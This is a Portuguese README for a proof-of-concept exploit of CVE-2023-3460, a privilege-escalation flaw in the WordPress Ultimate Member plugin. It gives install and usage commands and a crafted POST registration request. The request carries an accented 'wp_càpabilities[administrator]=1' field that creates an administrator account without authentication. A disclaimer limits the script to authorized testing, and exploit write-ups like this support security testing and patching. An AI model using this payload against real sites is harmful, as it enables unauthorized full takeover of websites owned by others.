
Prova de conceito de exploit para CVE-2023-3460, uma vulnerabilidade de escalonamento de privilégios no WordPress Ultimate Member. Cria uma conta de administrador por meio de uma solicitação de registro manipulada. Apenas para testes autorizados.
Este é um exploit de prova de conceito (PoC) para CVE-2023-3460, uma vulnerabilidade crítica no plugin do WordPress Ultimate Member. Ele permite que usuários não autenticados escalem seus privilégios para Administrador ao elaborar uma solicitação de registro maliciosa.
🔥 Impacto: Comprometimento total do site por meio da criação não autorizada de conta de administrador.
requestsurllib3beautifulsoup4Instale os requisitos:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce) da página de registrowp_capabilities com a função administratorPOST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
Este script é fornecido apenas para fins educacionais e de testes autorizados. A exploração não autorizada de sistemas é ilegal e antiética. Use-o somente em sistemas que você possui ou tem permissão para testar.